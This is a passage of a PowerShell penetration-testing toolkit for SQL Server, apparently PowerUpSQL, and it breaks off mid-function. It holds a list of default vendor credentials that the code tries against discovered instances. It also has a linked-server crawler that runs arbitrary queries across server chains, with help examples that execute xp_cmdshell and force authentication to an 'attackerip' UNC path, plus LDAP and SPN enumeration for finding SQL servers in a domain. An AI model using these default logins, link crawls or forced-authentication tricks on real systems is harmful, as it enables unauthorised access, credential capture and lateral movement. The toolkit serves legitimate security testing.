$DefaultPasswords.Rows.Add(\"BOSCHSQL\",\"sa\",\"RPSsql12345\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"BPASERVER9\",\"sa\",\"AutoMateBPA9\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"CDRDICOM\",\"sa\",\"CDRDicom50!\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"CODEPAL\",\"sa\",\"Cod3p@l\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"CODEPAL08\",\"sa\",\"Cod3p@l\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"CounterPoint\",\"sa\",\"CounterPoint8\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"CSSQL05\",\"ELNAdmin\",\"ELNAdmin\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"CSSQL05\",\"sa\",\"CambridgeSoft_SA\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"CADSQL\",\"CADSQLAdminUser\",\"Cr41g1sth3M4n!\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"DHLEASYSHIP\",\"sa\",\"DHLadmin@1\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"DPM\",\"admin\",\"ca_admin\") | out-null\n        $DefaultPasswords.Rows.Add(\"DVTEL\",\"sa\",\"\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"EASYSHIP\",\"sa\",\"DHLadmin@1\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"ECC\",\"sa\",\"Webgility2011\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"ECOPYDB\",\"e+C0py2007_@x\",\"e+C0py2007_@x\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"ECOPYDB\",\"sa\",\"ecopy\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"Emerson2012\",\"sa\",\"42Emerson42Eme\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"HDPS\",\"sa\",\"sa\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"HPDSS\",\"sa\",\"Hpdsdb000001\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"HPDSS\",\"sa\",\"hpdss\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"INSERTGT\",\"msi\",\"keyboa5\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"INSERTGT\",\"sa\",\"\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"INTRAVET\",\"sa\",\"Webster#1\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"MYMOVIES\",\"sa\",\"t9AranuHA7\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"PCAMERICA\",\"sa\",\"pcAmer1ca\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"PCAMERICA\",\"sa\",\"PCAmerica\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"PRISM\",\"sa\",\"SecurityMaster08\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"RMSQLDATA\",\"Super\",\"Orange\") | out-null\n        $DefaultPasswords.Rows.Add(\"RTCLOCAL\",\"sa\",\"mypassword\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"SALESLOGIX\",\"sa\",\"SLXMaster\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"SIDEXIS_SQL\",\"sa\",\"2BeChanged\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"SQL2K5\",\"ovsd\",\"ovsd\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"SQLEXPRESS\",\"admin\",\"ca_admin\") | out-null\n        $DefaultPasswords.Rows.Add(\"STANDARDDEV2014\",\"test\",\"test\") | Out-Null \n        $DefaultPasswords.Rows.Add(\"TEW_SQLEXPRESS\",\"tew\",\"tew\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"vocollect\",\"vocollect\",\"vocollect\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"VSDOTNET\",\"sa\",\"\") | Out-Null\n        $DefaultPasswords.Rows.Add(\"VSQL\",\"sa\",\"111\") | Out-Null\n\n        $PwCount = $DefaultPasswords | measure | select count -ExpandProperty count\n        # Write-Verbose \"Loaded $PwCount default passwords.\"\n    }\n\n    Process\n    {\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n       \n        # Grab only the instance name       \n        $TargetInstance = $Instance.Split(\"\\\")[1]\n\n        # Bypass ports and default instances\n        if(-not $TargetInstance){\n            Write-Verbose \"$Instance : No named instance found.\"\n            return\n        }\n       \n        # Check if instance is in list\n        $TblResultsTemp = \"\"\n        $TblResultsTemp = $DefaultPasswords | Where-Object { $_.instance -eq \"$TargetInstance\"}        \n\n        if($TblResultsTemp){    \n            Write-Verbose \"$Instance : Confirmed instance match.\" \n        }else{\n            Write-Verbose \"$Instance : No instance match found.\"\n            return \n        }        \n\n        # Grab username and password\n        $CurrentUsername = $TblResultsTemp.username\n        $CurrentPassword = $TblResultsTemp.password\n\n        # Test login\n        $LoginTest = Get-SQLServerInfo -Instance $instance -Username $CurrentUsername -Password $CurrentPassword -SuppressVerbose\n        if($LoginTest){\n\n            Write-Verbose \"$Instance : Confirmed default credentials - $CurrentUsername/$CurrentPassword\"\n\n            $SysadminStatus = $LoginTest | select IsSysadmin -ExpandProperty IsSysadmin\n\n            # Append if successful                      \n            $TblResults.Rows.Add(\n                $ComputerName,\n                $Instance,\n                $CurrentUsername,\n                $CurrentPassword,\n                $SysadminStatus\n            ) | Out-Null\n        }else{\n            Write-Verbose \"$Instance : No credential matches were found.\"\n        }\n    }\n\n    End\n    {\n        # Return data\n        $TblResults\n    }\n}\n\nFunction Get-SQLServerLinkCrawl{\n    <#\n    .SYNOPSIS\n    Get-SQLServerLinkCrawl attempts to enumerate and follow MSSQL database links.\n    .DESCRIPTION\n    Get-SQLServerLinkCrawl attempts to enumerate and follow MSSQL database links. The function enumerates database names, versions, and links,\n    and then enumerates the MSSQL user and the privileges that the link path has.\n    .EXAMPLE\n    Get-SQLServerLinkCrawl -Instance \"servername\\instancename\"\n    .PARAMETER Username\n    SQL Server or domain account to authenticate with.\n    .PARAMETER Password\n    SQL Server or domain account password to authenticate with.\n    .PARAMETER Credential\n    Windows credentials.\n    .PARAMETER Instance\n    SQL Server instance to connection to.\n    .PARAMETER DAC\n    Dedicated Administrator Connection (DAC).\n    .PARAMETER TimeOut\n    Connection timeout.\n    .PARAMETER Query\n    Custom SQL query to run on each server.\n    .PARAMETER Export\n    Convert collected data to exportable format.\n    .Example\n    Crawl linked servers and return a list of databases for each one in a readable format.\n    Get-SQLServerLinkCrawl -instance \"10.2.9.101\\SQLSERVER2008\" -username 'guest' -password 'guest' | where Instance -ne \"Broken Link\" |\n    foreach-object { Get-SQLQuery -instance \"10.2.9.101\\SQLSERVER2008\" -username 'guest' -password 'guest' -Query (get-SQLServerLinkQuery -Path $_.Path -Sql 'select system_user')}\n    .Example\n    Crawl linked servers and return a list of databases for each one as datatable objects.\n    Get-SQLServerLinkCrawl -instance \"SQLSERVER1\\Instance1\" -Query \"select name from master..sysdatabases\"\n    .Example\n    Crawl linked servers and return a list of databases for each one. and hide broken links.\n    Get-SQLServerLinkCrawl -instance \"SQLSERVER1\\Instance1\" -Query \"select name from master..sysdatabases\" | where name -ne \"Broken Link\" | select name,version,path,links,user,sysadmin,customquery | format-table\n    .Example\n    Crawl linked servers, execute an OS command using xp_cmdshell, and return the results.\n    Get-SQLServerLinkCrawl -instance \"SQLSERVER1\\Instance1\" -Query \"exec master..xp_cmdshell 'whoami'\" | format-table\n    .Example\n    Crawl linked servers, execute xp_dirtree, and return results.  This can also be used to force the SQL Server to authenticate to an attacker using a UNC path.\n    Get-SQLServerLinkCrawl -instance \"SQLSERVER1\\Instance1\" -Query \"exec xp_dirtree 'c:\\temp'\" -Export | format-table\n    Get-SQLServerLinkCrawl -instance \"SQLSERVER1\\Instance1\" -Query \"exec xp_dirtree '\\\\attackerip\\file'\" -Export | format-table\n    .Example\n     Crawl linked servers and return a list of databases for each one, then export to a to text objects for reporting.\n    Get-SQLServerLinkCrawl -instance \"SQLSERVER1\\Instance1\" -Query \"select name from master..sysdatabases\" -Export | where name -ne \"broken link\" | sort name |  Format-Table\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory=$false,\n        HelpMessage=\"SQL Server or domain account to authenticate with.\")]\n        [string]$Username,\n\n        [Parameter(Mandatory=$false,\n        HelpMessage=\"SQL Server or domain account password to authenticate with.\")]\n        [string]$Password,\n\n        [Parameter(Mandatory=$false,\n        HelpMessage=\"Windows credentials.\")]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n        \n        [Parameter(Mandatory=$false,\n        ValueFromPipelineByPropertyName=$true,\n        HelpMessage=\"SQL Server instance to connection to.\")]\n        [string]$Instance,\n\n        [Parameter(Mandatory=$false,\n        HelpMessage=\"Dedicated Administrator Connection (DAC).\")]\n        [Switch]$DAC,\n\n        [Parameter(Mandatory=$false,\n        HelpMessage=\"Connection timeout.\")]\n        [int]$TimeOut = 2,\n\n        [Parameter(Mandatory=$false,\n        HelpMessage=\"Custom SQL query to run on each server.\")]\n        [string]$Query,\n\n        [Parameter(Mandatory=$false,\n        HelpMessage=\"Convert collected data to exportable format.\")]\n        [switch]$Export\n    )\n\n    Begin\n    {   \n        $List = @()\n\n        $Server = New-Object PSObject -Property @{ Instance=\"\"; Version=\"\"; Links=@(); Path=@(); User=\"\"; Sysadmin=\"\"; CustomQuery=\"\"}\n\n        $List += $Server\n        $SqlInfoTable = New-Object System.Data.DataTable\n    }\n    \n    Process\n    {\n        $i=1\n        while($i){\n            $i--\n            foreach($Server in $List){\n                if($Server.Instance -eq \"\") {\n                    $List = (Get-SQLServerLinkData -list $List -server $Server -query $Query)\n                    $i++\n\n                    # Verbose output\n                    Write-Verbose \"--------------------------------\"\n                    Write-Verbose \" Server: $($Server.Instance)\"\n                    Write-Verbose \"--------------------------------\"\n                    Write-Verbose \" - Link Path to server: $($Server.Path -join ' -> ')\"                    \n                    Write-Verbose \" - Link Login: $($Server.User)\"                                   \n                    Write-Verbose \" - Link IsSysAdmin: $($Server.Sysadmin)\"\n                    Write-Verbose \" - Link Count: $($Server.Links.Count)\"                    \n                    Write-Verbose \" - Links on this server: $($Server.Links -join ', ')\"\n                }   \n            } \n        }\n\n        if($Export){\n            $LinkList = New-Object System.Data.Datatable\n            [void]$LinkList.Columns.Add(\"Instance\")\n            [void]$LinkList.Columns.Add(\"Version\")\n            [void]$LinkList.Columns.Add(\"Path\")\n            [void]$LinkList.Columns.Add(\"Links\")\n            [void]$LinkList.Columns.Add(\"User\")\n            [void]$LinkList.Columns.Add(\"Sysadmin\")\n            [void]$LinkList.Columns.Add(\"CustomQuery\")\n            \n            foreach($Server in $List){\n                [void]$LinkList.Rows.Add($Server.instance,$Server.version,$Server.path -join \" -> \", $Server.links -join \",\", $Server.user, $Server.Sysadmin, $Server.CustomQuery -join \",\")\n            }\n\n            return $LinkList\n        } else {\n            return $List\n        }\n    }\n  \n    End\n    {\n    }\n}\n\nFunction Get-SQLServerLinkData{\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory=$true,\n        HelpMessage=\"Return the server objects identified during the server link crawl.  Link crawling is done via theGet-SQLServerLinkCrawl function.\")]\n        $List,\n        \n        [Parameter(Mandatory=$true,\n        HelpMessage=\"Server object to be tested\")]\n        $Server,\n\n        [Parameter(Mandatory=$false,\n        HelpMessage=\"Custom SQL query to run\")]\n        $Query\n    )\n\n    Begin\n    {\n        $SqlInfoQuery = \"select @@servername as servername, @@version as version, system_user as linkuser, is_srvrolemember('sysadmin') as role\"\n        $SqlLinksQuery = \"select srvname from master..sysservers where dataaccess=1\"\n    }\n\n    Process\n    {\n        $SqlInfoTable = Get-SqlQuery -instance $Instance -Query ((Get-SQLServerLinkQuery -path $Server.Path -sql $SqlInfoQuery)) -Timeout $Timeout -Username $UserName -Password $Password -Credential $Credential\n        if($SqlInfoTable.Servername -ne $null){\n            $Server.Instance = $SqlInfoTable.Servername\n            $Server.Version = [System.String]::Join(\"\",(($SqlInfoTable.Version)[10..25]))\n            $Server.Sysadmin = $sqlInfoTable.role\n            $Server.User = $sqlInfoTable.linkuser\n            \n            if($List.Count -eq 1) { $Server.Path += ,$sqlInfoTable.servername }\n\n            $SqlInfoTable = Get-SqlQuery -instance $Instance -Query ((Get-SQLServerLinkQuery -path $Server.Path -sql $SqlLinksQuery)) -Timeout $Timeout -Username $UserName -Password $Password -Credential $Credential\n            $Server.Links = [array]$SqlInfoTable.srvname\n\n            if($Query -ne \"\"){\n                if($Query -like '*xp_cmdshell*'){\n                    $Query =  $Query + \" WITH RESULT SETS ((output VARCHAR(8000)))\"\n                }\n                if($Query -like '*xp_dirtree*'){\n                    $Query = $Query + \"  WITH RESULT SETS ((output VARCHAR(8000), depth int))\"\n                }\n                $SqlInfoTable = Get-SqlQuery -instance $Instance -Query ((Get-SQLServerLinkQuery -path $Server.Path -sql $Query)) -Timeout $Timeout -Username $UserName -Password $Password -Credential $Credential\n                if($Query -like '*WITH RESULT SETS*'){\n                    $Server.CustomQuery = $SqlInfoTable.output\n                } else {\n                    $Server.CustomQuery = $SqlInfoTable\n                }\n            }\n\n            if(($Server.Path | Sort-Object | Get-Unique).Count -eq ($Server.Path).Count){\n                foreach($Link in $Server.Links){\n                    $Linkpath = $Server.Path + $Link\n                    $List += ,(New-Object PSObject -Property @{ Instance=\"\"; Version=\"\"; Links=@(); Path=$Linkpath; User=\"\"; Sysadmin=\"\"; CustomQuery=\"\" })\n                }\n            }\n        } else {\n            $Server.Instance = \"Broken Link\"\n        }\n        return $List\n    }\n}\n\nFunction Get-SQLServerLinkQuery{\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory=$false,\n        HelpMessage=\"SQL link path to crawl. This is used by Get-SQLServerLinkCrawl.\")]\n        $Path=@(),\n        \n        [Parameter(Mandatory=$false,\n        HelpMessage=\"SQL query to build the crawl path around\")]\n        $Sql, \n        \n        [Parameter(Mandatory=$false,\n        HelpMessage=\"Counter to determine how many single quotes needed\")]\n        $Ticks=0\n\n    )\n    if ($Path.length -le 1){\n        return($Sql -replace \"'\", (\"'\"*[Math]::pow(2,$Ticks)))\n    } else {\n        return(\"select * from openquery(`\"\"+$Path[1]+\"`\",\"+\"'\"*[Math]::pow(2,$Ticks)+\n        (Get-SQLServerLinkQuery -path $Path[1..($Path.Length-1)] -sql $Sql -ticks ($Ticks+1))+\"'\"*[Math]::pow(2,$Ticks)+\")\")\n    }\n}\n\n#endregion\n\n#########################################################################\n#\n#region          DISCOVERY FUNCTIONS\n#\n#########################################################################\n\n# -------------------------------------------\n# Function: Get-DomainSpn\n# -------------------------------------------\n# Author: Scott Sutherland\n# Reference: http://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx\nfunction Get-DomainSpn\n{\n    <#\n            .SYNOPSIS\n            Used to query domain controllers via LDAP. Supports alternative credentials from non-domain system\n            Note: This will use the default logon server by default.\n            .PARAMETER Username\n            Domain account to authenticate to Active Directory.\n            .PARAMETER Password\n            Domain password to authenticate to Active Directory.\n            .PARAMETER Credential\n            Domain credential to authenticate to Active Directory.\n            .PARAMETER DomainController\n            Domain controller to authenticated to. Requires username/password or credential.\n            .PARAMETER ComputerName\n            Computer name to filter for.\n            .PARAMETER DomainAccount\n            Domain account to filter for.\n            .PARAMETER SpnService\n            SPN service code to filter for.\n            .EXAMPLE\n            PS C:\\temp> Get-DomainSpn -SpnService MSSQL | Select-Object -First 2\n\n            UserSid      : 15000005210002431346712321821222048886811922073100\n            User         : SQLServer1$\n            UserCn       : SQLServer1\n            Service      : MSSQLSvc\n            ComputerName : SQLServer1.domain.local\n            Spn          : MSSQLSvc/SQLServer1.domain.local:1433\n            LastLogon    : 6/24/2016 6:56 AM\n            Description  : This is a SQL Server test instance using a local managed service account.\n\n            UserSid      : 15000005210002431346712321821222048886811922073101\n            User         : SQLServiceAccount\n            UserCn       : SQLServiceAccount\n            Service      : MSSQLSvc\n            ComputerName : SQLServer2.domain.local\n            Spn          : MSSQLSvc/SQLServer2.domain.local:NamedInstance\n            LastLogon    : 3/26/2016 3:43 PM\n            Description  : This is a SQL Server test instance using a domain service account.\n            .EXAMPLE\n            PS C:\\temp> Get-DomainSpn -DomainController 10.0.0.1  -Username Domain\\User -Password Password123!\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Domain user to authenticate with domain\\user.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Domain password to authenticate with domain\\user.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Credentials to use when connecting to a Domain Controller.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Domain controller for Domain and Site that you want to query against.')]\n        [string]$DomainController,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Computer name to filter for.')]\n        [string]$ComputerName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipeline = $true,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Domain account to filter for.')]\n        [string]$DomainAccount,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SPN service code.')]\n        [string]$SpnService,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        if(-not $SuppressVerbose)\n        {\n            Write-Verbose -Message 'Getting domain SPNs...'\n        }\n\n        # Setup table to store results\n        $TableDomainSpn = New-Object -TypeName System.Data.DataTable\n        $null = $TableDomainSpn.Columns.Add('UserSid')\n        $null = $TableDomainSpn.Columns.Add('User')\n        $null = $TableDomainSpn.Columns.Add('UserCn')\n        $null = $TableDomainSpn.Columns.Add('Service')\n        $null = $TableDomainSpn.Columns.Add('ComputerName')\n        $null = $TableDomainSpn.Columns.Add('Spn')\n        $null = $TableDomainSpn.Columns.Add('LastLogon')\n        $null = $TableDomainSpn.Columns.Add('Description')\n        $TableDomainSpn.Clear()\n    }\n\n    Process\n    {\n\n        try\n        {\n            # Setup LDAP filter\n            $SpnFilter = ''\n\n            if($DomainAccount)\n            {\n                $SpnFilter = \"(objectcategory=person)(SamAccountName=$DomainAccount)\"\n            }\n\n            if($ComputerName)\n            {\n                $ComputerSearch = \"$ComputerName`$\"\n                $SpnFilter = \"(objectcategory=computer)(SamAccountName=$ComputerSearch)\"\n            }\n\n            # Get results\n            $SpnResults = Get-DomainObject -LdapFilter \"(&(servicePrincipalName=$SpnService*)$SpnFilter)\" -DomainController $DomainController -Username $Username -Password $Password -Credential $Credential\n\n            # Parse results\n            $SpnResults | ForEach-Object -Process {\n                [string]$SidBytes = [byte[]]\"$($_.Properties.objectsid)\".split(' ')\n                [string]$SidString = $SidBytes -replace ' ', ''\n                $Spn = $_.properties.serviceprincipalname[0].split(',')\n\n                foreach ($item in $Spn)\n                {\n                    # Parse SPNs\n                    $SpnServer = $item.split('/')[1].split(':')[0].split(' ')[0]\n                    $SpnService = $item.split('/')[0]\n\n                    # Parse last logon\n                    if ($_.properties.lastlogon)\n                    {\n                        $LastLogon = [datetime]::FromFileTime([string]$_.properties.lastlogon).ToString('g')\n                    }\n                    else\n                    {\n                        $LastLogon = ''\n                    }\n\n                    # Add results to table\n                    $null = $TableDomainSpn.Rows.Add(\n                        [string]$SidString,\n                        [string]$_.properties.samaccountname,\n                        [string]$_.properties.cn,\n                        [string]$SpnService,\n                        [string]$SpnServer,\n                        [string]$item,\n                        $LastLogon,\n                        [string]$_.properties.description\n                    )\n                }\n            }\n        }\n        catch\n        {\n            \"Error was $_\"\n            $line = $_.InvocationInfo.ScriptLineNumber\n            \"Error was in Line $line\"\n        }\n    }\n\n    End\n    {\n        # Check for results\n        if ($TableDomainSpn.Rows.Count -gt 0)\n        {\n            $TableDomainSpnCount = $TableDomainSpn.Rows.Count\n            if(-not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$TableDomainSpnCount SPNs found on servers that matched search criteria.\"\n            }\n            Return $TableDomainSpn\n        }\n        else\n        {\n            Write-Verbose -Message '0 SPNs found.'\n        }\n    }\n}\n\n\n# -------------------------------------------\n# Function: Get-DomainObject\n# -------------------------------------------\n# Author: Will Schroeder\n# Modifications: Scott Sutherland\nfunction Get-DomainObject\n{\n    <#\n            .SYNOPSIS\n            Used to query domain controllers via LDAP. Supports alternative credentials from non-domain system\n            Note: This will use the default logon server by default.\n            .PARAMETER Username\n            Domain account to authenticate to Active Directory.\n            .PARAMETER Password\n            Domain password to authenticate to Active Directory.\n            .PARAMETER Credential\n            Domain credential to authenticate to Active Directory.\n            .PARAMETER DomainController\n            Domain controller to authenticated to. Requires username/password or credential.\n            .PARAMETER LdapFilter\n            LDAP filter.\n            .PARAMETER LdapPath\n            Ldap path.\n            .PARAMETER $Limit\n            Maximum number of Objects to pull from AD, limit is 1,000.\".\n            .PARAMETER SearchScope\n            Scope of a search as either a base, one-level, or subtree search, default is subtree..\n            .EXAMPLE\n            PS C:\\temp> Get-DomainObject -LdapFilter \"(&(servicePrincipalName=*))\"\n            .EXAMPLE\n            PS C:\\temp> Get-DomainObject -LdapFilter \"(&(servicePrincipalName=*))\" -DomainController 10.0.0.1  -Username Domain\\User  -Password Password123!\n            .Note\n            This was based on Will Schroeder's Get-ADObject function from https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerView/powerview.ps1\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Domain user to authenticate with domain\\user.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Domain password to authenticate with domain\\user.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Credentials to use when connecting to a Domain Controller.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Domain controller for Domain and Site that you want to query against.')]\n        [string]$DomainController,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'LDAP Filter.')]\n        [string]$LdapFilter = '',\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'LDAP path.')]\n        [string]$LdapPath,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Maximum number of Objects to pull from AD, limit is 1,000 .')]\n        [int]$Limit = 1000,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'scope of a search as either a base, one-level, or subtree search, default is subtree.')]\n        [ValidateSet('Subtree','OneLevel','Base')]\n        [string]$SearchScope = 'Subtree'\n    )\n    Begin\n    {\n        # Create PS Credential object\n        if($Username -and $Password)\n        {\n            $secpass = ConvertTo-SecureString $Password -AsPlainText -Force\n            $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList ($Username, $secpass)\n        }\n\n        # Create Create the connection to LDAP\n        if ($DomainController)\n        {\n           \n            # Verify credentials were provided\n            if(-not $Username){\n                Write-Output \"A username and password must be provided when setting a specific domain controller.\"\n                Break\n            }\n\n            # Test credentials and grab domain\n            try {\n                $objDomain = (New-Object -TypeName System.DirectoryServices.DirectoryEntry -ArgumentList \"LDAP://$DomainController\", $Credential.UserName, $Credential.GetNetworkCredential().Password).distinguishedname\n            }catch{\n                Write-Output \"Authentication failed.\"\n            }\n\n            # add ldap path\n            if($LdapPath)\n            {\n                $LdapPath = '/'+$LdapPath+','+$objDomain\n                $objDomainPath = New-Object -TypeName System.DirectoryServices.DirectoryEntry -ArgumentList \"LDAP://$DomainController$LdapPath\", $Credential.UserName, $Credential.GetNetworkCredential().Password\n            }\n            else\n            {\n                $objDomainPath = New-Object -TypeName System.DirectoryServices.DirectoryEntry -ArgumentList \"LDAP://$DomainController\", $Credential.UserName, $Credential.GetNetworkCredential().Password\n            }\n\n            $objSearcher = New-Object -TypeName System.DirectoryServices.DirectorySearcher -ArgumentList $objDomainPath\n        }\n        else\n        {\n            $objDomain = ([ADSI]'').distinguishedName\n\n            # add ldap path\n            if($LdapPath)\n            {\n                $LdapPath = $LdapPath+','+$objDomain\n                $objDomainPath  = [ADSI]\"LDAP://$LdapPath\"\n            }\n            else\n            {\n                $objDomainPath  = [ADSI]''\n            }\n\n            $objSearcher = New-Object -TypeName System.DirectoryServices.DirectorySearcher -ArgumentList $objDomainPath\n        }\n\n        # Setup LDAP filter\n        $objSearcher.PageSize = $Limit\n        $objSearcher.Filter = $LdapFilter\n        $objSearcher.SearchScope = 'Subtree'\n    }\n\n    Process\n    {\n        try\n        {\n            # Return object\n            $objSearcher.FindAll() | ForEach-Object -Process {\n                $_\n            }\n        }\n        catch\n        {\n            \"Error was $_\"\n            $line = $_.InvocationInfo.ScriptLineNumber\n            \"Error was in Line $line\"\n        }\n    }\n\n    End\n    {\n    }\n}\n\n# -------------------------------------------\n# Function:  Get-SQLInstanceDomain\n# -------------------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLInstanceDomain\n{\n    <#\n            .SYNOPSIS\n            Returns a list of SQL Server instances discovered by querying a domain controller for systems with registered MSSQL service principal names.\n            The function will default to the current user's domain and logon server, but an alternative domain controller can be provided.\n            UDP scanning of management servers is optional.\n            .PARAMETER Username\n            Domain user to authenticate with domain\\user.\n            .PARAMETER Password\n            Domain password to authenticate with domain\\user.\n            .PARAMETER Credential\n            Credentials to use when connecting to a Domain Controller.\n            .PARAMETER DomainController\n            Domain controller for Domain and Site that you want to query against.  Only used when username/password or credential is provided.\n            .PARAMETER ComputerName\n            Domain computer name to filter for.\n            .PARAMETER DomainAccount\n            Domain account to filter for.\n            .PARAMETER CheckMgmt\n            Performs UDP scan of servers with registered MSServerClusterMgmtAPI SPNs to help find additional SQL Server instances.\n            .PARAMETER UDPTimeOut\n            Timeout in seconds for UDP scans of management servers. Longer timeout = more accurate.\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain -Verbose\n            VERBOSE: Grabbing SQL Server SPNs from domain...\n            VERBOSE: Getting domain SPNs...\n            VERBOSE: Parsing SQL Server instances from SPNs...\n            VERBOSE: 35 instances were found.\n\n            ComputerName     : SQLServer1.domain.com\n            Instance         : SQLServer1.domain.com\n            DomainAccountSid : 1500000521000123456712921821222049996811922123456\n            DomainAccount    : SQLServer1$\n            DomainAccountCn  : SQLServer1\n            Service          : MSSQLSvc\n            Spn              : MSSQLSvc/SQLServer1.domain.com\n            LastLogon        : 6/22/2016 9:00 AM\n            [TRUNCATED]\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain -Verbose -CheckMgmt\n            PS C:\\> Get-SQLInstanceDomain -Verbose\n            VERBOSE: Grabbing SQL Server SPNs from domain...\n            VERBOSE: Getting domain SPNs...\n            VERBOSE: Parsing SQL Server instances from SPNs...\n            VERBOSE: 35 instances were found.\n            VERBOSE: Getting domain SPNs...\n            VERBOSE: 10 SPNs found on servers that matched search criteria.\n            VERBOSE: Performing a UDP scan of management servers to obtain managed SQL Server instances...\n            VERBOSE:  - MServer1.domain.com - UDP Scan Start.\n            VERBOSE:  - MServer1.domain.com - UDP Scan Complete.\n\n            ComputerName     : SQLServer1.domain.com\n            Instance         : SQLServer1.domain.com\n            DomainAccountSid : 1500000521000123456712921821222049996811922123456\n            DomainAccount    : SQLServer1$\n            DomainAccountCn  : SQLServer1\n            Service          : MSSQLSvc\n            Spn              : MSSQLSvc/SQLServer1.domain.com\n            LastLogon        : 6/22/2016 9:00 AM\n            [TRUNCATED]\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain -DomainController 10.10.10.1 -Username domain\\user -Password SecretPassword123!\n            VERBOSE: Grabbing SQL Server SPNs from domain...\n            VERBOSE: Getting domain SPNs...\n            VERBOSE: Parsing SQL Server instances from SPNs...\n            VERBOSE: 35 instances were found.\n\n            ComputerName     : SQLServer1.domain.com\n            Instance         : SQLServer1.domain.com\n            DomainAccountSid : 1500000521000123456712921821222049996811922123456\n            DomainAccount    : SQLServer1$\n            DomainAccountCn  : SQLServer1\n            Service          : MSSQLSvc\n            Spn              : MSSQLSvc/SQLServer1.domain.com\n            LastLogon        : 6/22/2016 9:00 AM\n            [TRUNCATED]\n\n\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Domain user to authenticate with domain\\user.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Domain password to authenticate with domain\\user.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Credentials to use when connecting to a Domain Controller.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Domain controller for Domain and Site that you want to query against.')]\n        [string]$DomainController,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipeline = $true,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Computer name to filter for.')]\n        [string]$ComputerName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipeline = $true,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Domain account to filter for.')]\n        [string]$DomainAccount,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Performs UDP scan of servers managing 